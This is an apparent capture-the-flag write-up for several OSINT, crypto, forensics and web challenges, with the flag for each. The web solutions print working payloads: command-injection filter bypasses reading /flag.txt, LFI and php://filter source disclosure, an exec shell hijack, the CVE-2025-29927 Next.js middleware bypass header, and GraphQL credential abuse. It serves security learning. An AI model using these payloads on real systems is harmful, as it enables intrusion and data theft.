by looking up their user on reddit, we can find a post on r/pcmasterrace where they mention the pc specs that they want to buy in a link to pcpartpicker.com.

from this, it can be found that the processor they want is the AMD Ryzen 7 7800X3D 4.2 GHz 8-Core Processor.

flag: SENTI{AMD Ryzen 7 7800X3D}

> Work 4 (OSINT, 200)

a post on the boss’ twitter suggests that the boss has an instagram.

first we attempted to look up the boss’ instagram via their email, but we didnt find anything meaningful

then we realised that if the boss’ twitter account was called ‘boss_work_acc’, the boss’ personal instagram account would be named in a similar fashion.

using this knowledge, we identified the boss’ instagram account at the username ‘boss_family_acc’

and we can identify his family members Zhilin (age 27), Linzong (age 11), Meilin (age 7)”

flag: SENTI{Meilin_Linzong_Zhilin}

> Work 5 (OSINT, 250)

the employee ‘pasted’ their password somewhere.

this leads to the implication that they used a pastebin web service, such as pastebin.com

searching up the username NOMOREBRAWL on pastebin, we can find the employee’s password, ‘wasitacaroracatisaw’

flag: SENTI{wasitacaroracatisaw}

> i hate gp (Crypto, 100)

we are given a text file of strings of i_hategp.

each character in each i_hategp can vary. the letters can be upper or lower, while the underscore can be replaced with a space ( ). since the characters are grouped in 8s and the characters can have two variations each, it can be inferred that this cipher is binary.

through trial and error, the binary conversion can be inferred through two rules if the second character is an underscore, the bit is 1, if it is a space then the bit is 0 if any letter is uppercase the bit is 1, otherwise the bit is 0

by putting it into chatgpt and telling it the rules, we can uncover the flag.

flag: SENTI{I_L0v3_GP!1!}

> Nonsense (Crypto, 150)

we are given a very suspicious looking string of emojis, 🥰😆🙂😘🤣{😚😂😛😁🤣😁😛🙃😗😁🙃😘😂🤣🥰} which obviously resembles a flag format.

my first thought was that these must be Unicode numbers mod 26, because surely the first five would map to SENTI (it didnt)

a friend then figured out that the emojis correspond to the first 26 emojis on a phone keypad, meaning each emoji = a letter A–Z.

23, 8, 25, 4, 9, 4, 25, 15, 21, 4, 15, 20, 8, 9, 19

which translates to

W H Y D I D Y O U D O T H I S

flag: SENTI{WHYDIDYOUDOTHIS}

> Soundcheck (Forensics, 150)

we are presented with a zip full of .wav audio files.

upon taking a look at the contents, i sort the contents by file size, and one file stands out as larger due to its 3789kb file size as compared to the other .wav’s 173 kb.

upon listening to said .wav, the audio sounds very reminiscent of morse code.

placing the audio into a morse decoder yields the flag.

flag: SENTI{BBEEEBEEPBOOPBEEEEEEPBOOPBOPBOPBOPBBOPBOP}

> Brunner’s Bakery (Web, 315 solves)

the challenge description: Recent Graphs show that we need some more Quality of Life recipes! Can you go check if the bakery is hiding any?!

this, and from the source code

<!DOCTYPE html> 
<html> 
    <head> 
        <title>Brunner's Bakery</title> 
        <style> body { font-family: sans-serif; background: #fff8f8; padding: 20px; } h1 { color: #d6336c; } .grid { display: grid; grid-template-columns: repeat(auto-fill,minmax(250px,1fr)); gap: 1rem; } .card { background: white; border-radius: 10px; padding: 1rem; box-shadow: 0 4px 6px rgba(0,0,0,0.1); } .title { font-size: 1.2rem; color: #d6336c; } .author { color: #666; font-size: 0.9rem; } .desc { margin-top: 0.5rem; color: #444; } </style> 
        </head>
    <body> 
        <h1>Brunner's Bakery</h1> 
        <p>Sweet treats, baked fresh daily</p> 
        <div id="recipes" class="grid"></div> 
        <script> 
            fetch('/graphql', { method: 'POST', headers: { 'Content-Type': 'application/json' }, body: JSON.stringify({ query: 'query { publicRecipes { name description author { displayName } ingredients { name } } }' }) }) .then(res => res.json()) .then(data => { const container = document.getElementById('recipes'); 
            (data.data.publicRecipes || []).forEach(r => { const div = document.createElement('div'); div.className = 'card'; 
            div.innerHTML = '<div class="title">' + r.name + '</div>' + '<div class="author">by ' + r.author.displayName + '</div>' + '<div class="desc">' + r.description + '</div>' + '<div style="font-size:0.8rem;color:#777;margin-top:0.5rem;">Ingredients: ' + r.ingredients.map(i => i.name).join(', ') + '</div>'; container.appendChild(div); }); }); 
            </script> 
    </body> 
</html>

…exposing a /graphql endpoint, we can infer that this is a graphql challenge

we can send a POST request to /graphql to query the graphql. some basic introspection:

curl -s -X POST https://brunner-s-bakery.challs.brunnerne.xyz/graphql \ -H "Content-Type: application/json" \ -d '{"query":"{ __schema { types { name fields { name } } } }"}'

┌──(venv)─(kali㉿kali)-[~/Desktop/forensics_new-order] 
└─$ curl -s -X POST https://brunner-s-bakery.challs.brunnerne.xyz/graphql \ -H 

"Content-Type: application/json" \ -d '{"query":"{ __schema { types { name fields { name } } } }"}' {"data":{"__schema":{"types":[{"name":"Query","fields":[{"name":"publicRecipes"},{"name":"secretRecipes"},{"name":"me"}]},{"name":"Mutation","fields":[{"name":"login"}]},{"name":"String","fields":null},{"name":"AuthPayload","fields":[{"name":"token"},{"name":"user"}]},{"name":"Recipe","fields":[{"name":"id"},{"name":"name"},{"name":"description"},{"name":"isSecret"},{"name":"author"},{"name":"ingredients"}]},{"name":"ID","fields":null},{"name":"Boolean","fields":null},{"name":"Ingredient","fields":[{"name":"name"},{"name":"supplier"}]},{"name":"Supplier","fields":[{"name":"id"},{"name":"name"},{"name":"owner"}]},{"name":"User","fields":[{"name":"id"},{"name":"username"},{"name":"displayName"},{"name":"email"},{"name":"notes"},{"name":"privateNotes"},{"name":"recipes"}]},{"name":"__Schema","fields":[{"name":"description"},{"name":"types"},{"name":"queryType"},{"name":"mutationType"},{"name":"subscriptionType"},{"name":"directives"}]},{"name":"__Type","fields":[{"name":"kind"},{"name":"name"},{"name":"description"},{"name":"specifiedByURL"},{"name":"fields"},{"name":"interfaces"},{"name":"possibleTypes"},{"name":"enumValues"},{"name":"inputFields"},{"name":"ofType"},{"name":"isOneOf"}]},{"name":"__TypeKind","fields":null},{"name":"__Field","fields":[{"name":"name"},{"name":"description"},{"name":"args"},{"name":"type"},{"name":"isDeprecated"},{"name":"deprecationReason"}]},{"name":"__InputValue","fields":[{"name":"name"},{"name":"description"},{"name":"type"},{"name":"defaultValue"},{"name":"isDeprecated"},{"name":"deprecationReason"}]},{"name":"__EnumValue","fields":[{"name":"name"},{"name":"description"},{"name":"isDeprecated"},{"name":"deprecationReason"}]},{"name":"__Directive","fields":[{"name":"name"},{"name":"description"},{"name":"isRepeatable"},{"name":"locations"},{"name":"args"}]},{"name":"__DirectiveLocation","fields":null}]}}}

there’s a field called ‘secretRecipes’, which could be where our flag is.

curl -s -X POST https://brunner-s-bakery.challs.brunnerne.xyz/graphql \ -H "Content-Type: application/json" \ -d '{"query":"{ secretRecipes { id name description isSecret author { displayName } ingredients { name supplier { name } } } }"}'

{"errors":[{"message":"Access denied. admin only.","locations":[{"line":1,"column":3}],"path":["secretRecipes"],"extensions":{"code":"UNAUTHENTICATED","exception":{"stacktrace":["AuthenticationError: Access denied. admin only."," at Object.secretRecipes (/app/server.js:213:15)"," at field.resolve (/app/node_modules/apollo-server-core/dist/utils/schemaInstrumentation.js:56:26)"," at executeField (/app/node_modules/graphql/execution/execute.js:500:20)"," at executeFields (/app/node_modules/graphql/execution/execute.js:422:22)"," at executeOperation (/app/node_modules/graphql/execution/execute.js:352:14)"," at execute (/app/node_modules/graphql/execution/execute.js:136:20)"," at execute (/app/node_modules/apollo-server-core/dist/requestPipeline.js:207:48)"," at processGraphQLRequest (/app/node_modules/apollo-server-core/dist/requestPipeline.js:150:34)"," at process.processTicksAndRejections (node:internal/process/task_queues:105:5)"," at async processHTTPRequest (/app/node_modules/apollo-server-core/dist/runHttpQuery.js:222:30)"]}}}],"data":null}

we got blocked because we don’t have admin creds.

not to worry, let’s find another way in.

looking at the public recipes:

{
  "data": {
    "publicRecipes": [
      {
        "author": {
          "username": "sally",
          "privateNotes": null
        }
      },
      {
        "author": {
          "username": "sally",
          "privateNotes": null
        }
      },
      ...
    ]
  }
}

one username is sally. let’s look deeper by querying her profile information via referencing it from recipes:

{
  publicRecipes {
    id
    name
    description
    author {
      username
      email
      notes
      privateNotes
    }
  }
}

result:

"publicRecipes": [ { "id": "r1", "name": "Lemon Drizzle", "description": "A zesty lemon drizzle cake for the window display.", "author": { "username": "sally", "email": "sally@brunners.local", "notes": "TODO: Remove temporary credentials... brunner_admin:Sw33tT00Th321?", "privateNotes": null } },

bingo, we have admin credentials. we can use this at the login mutation to generate a valid jwt token, then include it in the Authorization header of the POST request.

mutation {
  login(username:"brunner_admin", password:"Sw33tT00Th321?") {
    token
    user {
      id
      username
    }
  }
}
mutation {
  login(username:"brunner_admin", password:"Sw33tT00Th321?") {
    token
    user {
      id
      username
    }
  }
}

result:

{ "data": { "login": { "token": "eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJpZCI6InUyIiwicm9sZSI6ImFkbWluIiwiaWF0IjoxNzU1ODY3ODA4LCJleHAiOjE3NTU4NzUwMDh9.b3cJfjrYblHcppy4Z_gBfjFg-0cayUTqRwFBc_9BCcI", "user": { "id": "u2", "username": "brunner_admin" } } } }

now we can read secretRecipes via curl:

curl -s -X POST https://brunner-s-bakery.challs.brunnerne.xyz/graphql \
  -H "Content-Type: application/json" \
  -H "Authorization: Bearer eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJpZCI6InUyIiwicm9sZSI6ImFkbWluIiwiaWF0IjoxNzU1ODY3ODA4LCJleHAiOjE3NTU4NzUwMDh9.b3cJfjrYblHcppy4Z_gBfjFg-0cayUTqRwFBc_9BCcI" \
  -d '{"query":"{ secretRecipes { id name description author { username email } } }"}'

result

{"data":{"secretRecipes":[{"id":"r_secret_1","name":"The Golden Gateau","description":"A secret signature cake used for VIP orders.","author":{"username":"brunner_admin","email":"admin@brunners.local"}}]}}

i wasnt really sure what to do from here, but then i looked at recipes and remembered that they have an ingredients field with attributes for their suppliers, which are also users with private notes:

curl -s -X POST https://brunner-s-bakery.challs.brunnerne.xyz/graphql \ 
    -H "Content-Type: application/json" \ 
    -H "Authorization: Bearer eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJpZCI6InUyIiwicm9sZSI6ImFkbWluIiwiaWF0IjoxNzU1ODY3ODA4LCJleHAiOjE3NTU4NzUwMDh9.b3cJfjrYblHcppy4Z_gBfjFg-0cayUTqRwFBc_9BCcI" \ 
    -d '{"query":"{ secretRecipes { id name description isSecret author { id username displayName email notes privateNotes recipes { id name description isSecret } } ingredients { name supplier { id name owner { id username email } } } } }"}'

result:

{"data":{"secretRecipes":[{"id":"r_secret_1","name":"The Golden Gateau","description":"A secret signature cake used for VIP orders.","isSecret":true,"author":{"id":"u2","username":"brunner_admin","displayName":"Brunner Admin","email":"admin@brunners.local","notes":"Head baker","privateNotes":null,"recipes":[{"id":"r_secret_1","name":"The Golden Gateau","description":"A secret signature cake used for VIP orders.","isSecret":true}]},"ingredients":[{"name":"Rare Cocoa","supplier":{"id":"s1","name":"Heavenly Sugar Co","owner":{"id":"u4","username":"grandmaster_brunner","email":"gm@brunners.local"}}},{"name":"Aged Butter","supplier":{"id":"s2","name":"Golden Eggs Ltd","owner":{"id":"u3","username":"junior_baker","email":"tim@brunners.local"}}}]}]}}

let’s try to take a look at users u4 and u3 with usernames grandmaster_brunner and junior_baker.

curl -s -X POST https://brunner-s-bakery.challs.brunnerne.xyz/graphql \
  -H "Content-Type: application/json" \
  -H "Authorization: Bearer eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJpZCI6InUyIiwicm9sZSI6ImFkbWluIiwiaWF0IjoxNzU1ODY3ODA4LCJleHAiOjE3NTU4NzUwMDh9.b3cJfjrYblHcppy4Z_gBfjFg-0cayUTqRwFBc_9BCcI" \
  -d '{"query":"{ secretRecipes { name ingredients { name supplier { name owner { id username displayName email notes privateNotes recipes { id name description isSecret } } } } } }"}'

due to my earlier dawdling my jwt expired so it blocked me

{"errors":[{"message":"Access denied. admin only.","locations":[{"line":1,"column":3}],"path":["secretRecipes"],"extensions":{"code":"UNAUTHENTICATED","exception":{"stacktrace":["AuthenticationError: Access denied. admin only."," at Object.secretRecipes (/app/server.js:213:15)"," at field.resolve (/app/node_modules/apollo-server-core/dist/utils/schemaInstrumentation.js:56:26)"," at executeField (/app/node_modules/graphql/execution/execute.js:500:20)"," at executeFields (/app/node_modules/graphql/execution/execute.js:422:22)"," at executeOperation (/app/node_modules/graphql/execution/execute.js:352:14)"," at execute (/app/node_modules/graphql/execution/execute.js:136:20)"," at execute (/app/node_modules/apollo-server-core/dist/requestPipeline.js:207:48)"," at processGraphQLRequest (/app/node_modules/apollo-server-core/dist/requestPipeline.js:150:34)"," at process.processTicksAndRejections (node:internal/process/task_queues:105:5)"," at async processHTTPRequest (/app/node_modules/apollo-server-core/dist/runHttpQuery.js:222:30)"]}}}],"data":null}

back on track with a valid jwt

curl -s -X POST https://brunner-s-bakery.challs.brunnerne.xyz/graphql \
  -H "Content-Type: application/json" \
  -H "Authorization: Bearer eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJpZCI6InUyIiwicm9sZSI6ImFkbWluIiwiaWF0IjoxNzU1ODY4NjU2LCJleHAiOjE3NTU4NzU4NTZ9.oE_HOPNy4BQeM22YRVyVABjUjsibMY-KE_K1ny1EzFI" \
  -d '{"query":"{ secretRecipes { name ingredients { name supplier { name owner { id username displayName email notes privateNotes } } } } }"}'

we can get the flag in the private notes of the grandmaster brunner (image taken from someone in the discord since i forgor to copy down the last result)

flag: brunner{Gr4phQL_1ntR0sp3ct10n_G035_R0UnD_4Nd_r0uND}

> Baking Bad (Web, 339 solves)

From the challenge description:

Luckily, the developers at Brunnerne have come up with a bash -c 'recipe' that can simulate the baking process.

The website has a textbox that accepts user input and generates a ‘Purity’ value. since the challenge description tells us that this is done through a command, we can attempt command injection.

we start off simple to list all files in the directory with ; ls -la. this payload escapes the previous command by ending it early with a ; and injects our new command, ‘ls -la’, but we are blocked with an error due to unauthorised characters in our input.

through trial and error, we can figure out that the blocked characters include ` ` (space), () (parentheses), / (forward slash), * (asterisk), < (left triangle bracket), , (comma)

that’s okay, we can still make an attempt to list directory contents by eliminating the space and -la in our original payload, to make: ;ls

result: index.php quality.sh static

attempts to cat, echo or read any of the files are blocked by either the characters filter or another filter that blocks commands like rm cat cp touch echo read.

let’s first bypass the command filter in order to call cat on index.php. this can be done by the payload 'c''at' that splits cat into two single-quoted strings.

then to include a space between cat and index.php we can make use of the Internal Field Separator ${IFS} to inject a space between the two fields, bypassing the filter that blocks spaces.

payload: ;'c''at'${IFS}'index.php'

$denyListCharacters = ['"', '*', '/', ' ', '<', '(', ')', '[', ']', '\\'];
$denyListCommands = ['rm', 'mv', 'cp', 'cat', 'echo', 'touch', 'chmod', 'chown', 'kill', 'ps', 'top', 'find'];
function loadSecretRecipe() { 
    file_get_contents('/flag.txt'); 
} 
function sanitizeCharacters($input) { 
    for ($i = 0; $i < strlen($input); $i++) { 
        if (in_array($input[$i], $GLOBALS['denyListCharacters'], true)) { 
            return 'Illegal character detected!'; } 
        } 
        return $input;
    } 
function sanitizeCommands($input) { 
    foreach ($GLOBALS['denyListCommands'] as $cmd {    
        if (stripos($input, $cmd) !== false) {      
            return 'Illegal command detected!'; 
        } 
    } 
        return $input; 
    } 
function analyze($ingredient) { 
    $tmp = sanitizeCharacters($ingredient); 
    if ($tmp !== $ingredient) { return $tmp; } 
    $tmp = sanitizeCommands($ingredient); 
    if ($tmp !== $ingredient) { return $tmp; } 
    return shell_exec("bash -c './quality.sh $ingredient' 2>&1"); } $result = $ingredient !== '' ? analyze($ingredient) : '';

we want to read /flag.txt. however, recall that forward slashes / are blocked by the character filter.

to bypass this, note that the $PWD constant, referring to the path to the root directory, will contain a slash (eg. /root/)

we can use string slicing to extract the first character of $PWD and combine it with the original cat splitting and $IFS to cat /flag.txt.

final payload: ;'c''at'${IFS}${PWD:0:1}flag.txt

flag: brunner{d1d_1_f0rg37_70_b4n_s0m3_ch4rz?}

> Brunsviger Husset (Web, 291 solves)

an interesting part of the source code:

const printUrl = 'print.php?file=/var/www/html/bakery-calendar.php&start=2025-07&end=2025-09';

the file parameter is directly passed to print.php. if this isn’t sanitised properly, this can lead to a Local File Inclusion (LFI) vulnerability, letting us read files on the backend.

let’s try the per-procedure to pass /etc/passwd to the file parameter, and attempt to read it:

/print.php?file=/etc/passwd

root:x:0:0:root:/root:/bin/bash www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin

it can be read, so this site is vulnerable to lfi.

visiting /robots.txt:

User-agent: * Allow: /index.php Allow: /bakery-calendar.php Disallow: /print.php Disallow: /secrets.php

let’s try to LFI secrets.php:

/print.php?file=/secrets.php

the site is blank. that makes sense, since the php is being run on the backend.

we can get it to spit out the source by base64 encoding the file contents, then decoding:

/print.php?file=php://filter/convert.base64-encode/resource=secrets.php

PD9waHAKLy8gS2VlcCB0aGlzIGZpbGUgc2VjcmV0LCBpdCBjb250YWlucyBzZW5zaXRpdmUgaW5mb3JtYXRpb24uCiRmbGFnID0gImJydW5uZXJ7bDBjNGxfZjFsM18xbmNsdXMxMG5fMW5fdGgzX2I0azNyeX0iOwo/Pgo=

decode in a platform such as CyberChef:

<?php
// Keep this file secret, it contains sensitive information.
$flag = "brunner{l0c4l_f1l3_1nclus10n_1n_th3_b4k3ry}";
?>

flag: brunner{l0c4l_f1l3_1nclus10n_1n_th3_b4k3ry}

> Recipe For Disaster (Web, 107 solves)

/api/settings does a deep merge of your JSON into app.locals.settings:

deepMerge(app.locals.settings, req.body);

Later, /export uses those merged settings as options to child_process.exec:

const baseOpts = Object.assign({}, app.locals.settings.exportOptions || {});
const envFromSettings = baseOpts.env || {};      // (they try to delete env earlier)
const env = Object.assign({}, process.env, envFromSettings);
const opts = Object.assign({}, baseOpts, { cwd: __dirname, env });
exec(cmd, opts, (err, stdout, stderr) => { ... });

they block exportOptions.env in /api/settings, but they don’t block exportOptions.shell (or other exec options like uid, gid, timeout, maxBuffer, etc.).

exec will run your command through whatever shell you set in opts.shell. If we point shell to our own script, our script runs first and can print /flag.txt before delegating to a real shell.

therefore, let’s upload a shell and read the flag.

curl -s -X POST https://recipe-for-disaster-72bf042470e3a9aa.challs.brunnerne.xyz/api/note \
  -H 'Content-Type: application/json' \
  -d '{
        "name": "brun1",
        "filename": "sh",
        "makeExecutable": true,
        "content": "#!/bin/sh\ncat /flag.txt\nexec /bin/sh \"$@\""
      }'

get the server to use our shell as shim:

curl -s -X POST https://recipe-for-disaster-72bf042470e3a9aa.challs.brunnerne.xyz/api/settings \
  -H 'Content-Type: application/json' \
  -d '{ "exportOptions": { "shell": "./data/brun1/sh" } }'

run shim:

curl -s "https://recipe-for-disaster-72bf042470e3a9aa.challs.brunnerne.xyz/export?name=brun1"

flag: brunnerCTF{pr0t0typ3_p011u710n_0v3rfl0w1ng_7h3_0v3n}

> EPIC CAKE BATTLES OF HISTORY!!! (Web, 131 solves)

requests to /admin trigger a middleware.ts which redirects you back to / if you arent admin:

import { NextResponse } from 'next/server'
import type { NextRequest } from 'next/server'

// This function can be marked `async` if using `await` inside
export function middleware(request: NextRequest) {
  // @ts-ignore
    if("CHAMPION" == "FOUND")
        return NextResponse.redirect(new URL('/admin', request.url))
  return NextResponse.redirect(new URL('/', request.url))
}

// See "Matching Paths" below to learn more
export const config = {
  matcher: '/admin/:path*',
}

which is effectively impossible to override because the check is hardcoded

for context, the next.js framework sometimes issues subrequests (e.g., prefetching or API calls triggered by middleware itself).

to avoid infinite loops (middleware calling itself repeatedly), Next.js uses an internal header:

x-middleware-subrequest

this header carries a colon-separated list of middleware names that have already been executed.

before running, runMiddleware()checks:

const subreq = request.headers["x-middleware-subrequest"];
const subrequests = typeof subreq === "string" ? subreq.split(":") : [];

if (subrequests.includes(middlewareInfo.name)) {
    // Skip this middleware entirely
    return NextResponse.next();
}

if the header says “middleware” already ran, Next.js skips it.

doing some googling to find any potential vulnerability yields this report on CVE-2025-29927 Next.js Middleware Authorization Bypass

quote:

The vulnerability in CVE-2025-29927 stems from a design flaw in how Next.js processes the x-middleware-subrequest header. This header was originally intended for internal use within the Next.js framework to prevent infinite middleware execution loops.When a Next.js application uses middleware, the runMiddleware function is called to process incoming requests. As part of its functionality, this function checks for the presence of the x-middleware-subrequest header. If this header exists and contains a specific value, the middleware execution is skipped entirely, and the request is forwarded directly to its original destination via NextResponse.next().

reading the dependencies:

"packages": { "": { "name": "epic-cake-battles", "version": "0.1.0", "dependencies": { "next": "15.2.2", "react": "^19.0.0", "react-dom": "^19.0.0" }, ...

referring to the above article to view the correct exploit (version 13.2.0 and later:)

Alternatively, for projects using a /src directory structure:

x-middleware-subrequest: src/middleware:src/middleware:src/middleware:src/middleware:

literally just add the above as a header to the request and it will yield the flag.

flag: brunner{0th3llo-iz-b3st-cake}

> ArrayVM (Web, 39 solves)

the website allows us to script in an array indexing-based programming language (that happens to be implemented in js)

there’s one real storage: this.backing, a plain Array (i.e., a sparse object with special behavior for non‑negative 32‑bit indices).

the flag is stashed at key -1:

this.backing[-1] = fs.readFileSync("./flag.txt");

js has a language quirk where negative indexes are just string properties (“-1”), not elements. but this.backing[-1] still returns the value: property lookup works for any string key.

every ‘array’ in the VM is a slice of this.backing.

backing[B]         = size
backing[B + 1]     = elem[0]
backing[B + 2]     = elem[1]
...

addressing an element uses:

B + idx + 1

and there’s a bounds check idx < size. (notice how there’s no check that the final computed address is non‑negative.)

creating a new VM array chooses its base by walking past the previous one:

newBacking = lastBacking + lastSize + 1;

so we have our exploit path: if we can make lastSize negative enough, newBacking becomes negative, and then choosing an idx can hit -1 (the flag).

in js, all numbers are IEEE‑754 doubles (53 bits of integer precision). essentially, this means that:

• every integer is exactly representable up to 2^53 (= 9007199254740992).

• for numbers ≥ 2^53, the spacing between representable integers becomes 2. So 2^53 + 1 rounds to 2^53; the next representable is 2^53 + 2.

two places in the VM add +1:

• when placing the next array: newBacking = lastBacking + lastSize + 1

• when computing an element address: B + idx + 1.

if we force a base B to be exactly 2^53, then B + 1 rounds back to B, which means elem[0] aliases the header (which is at B). this gives us a header‑overwrite primitive: any write to elem[0] will write to the size field instead.

to get such a B we make the previous array’s size 2^53.

newBacking = lastBacking + lastSize + 1
           = 0 + 2^53 + 1

once we can write to the size field of array #1 via its elem[0], we set it to a large negative number. this will cause the next NEW to

B_next = B_alias + size_overwritten + 1
       = 2^53   + ( -2^53 - x ) + 1
       = -x + 1

we pick x to be 4, so that B_next = -3. this is because if x were 2, B_next = -2 + 1 = -1, which places the next array’s header at -1, writing over the flag.

with B_next = -3, the header goes to -3 (safe), and then elem[1] sits at -3 + 1 + 1 = -1.

we can use SUB to compute negatives:

size1 = 0 - (2^53 + 4) = -2^53 - 4

so the following VM program will spit out the flag:

NEW 9007199254740992

NEW 1

INIT 0.0 0
INIT 0.1 9007199254740996

# aliasing bug:
# size1 = 0 - (2^53 + 4) = -9007199254740996
SUB 0.0 0.1 1.0

# B2 = (2^53) + (-2^53 - 4) + 1 = -3
NEW 2

PRINT 2.1

the bounds check (if (!(idx < arrSize)) throw ...) implemented doesn’t help here because this only violates logic, not the physical address. the VM never verifies that size is non‑negative or a safe integer.

flag: brunner{I_was_certain_using_arrays_was_a_good_idea}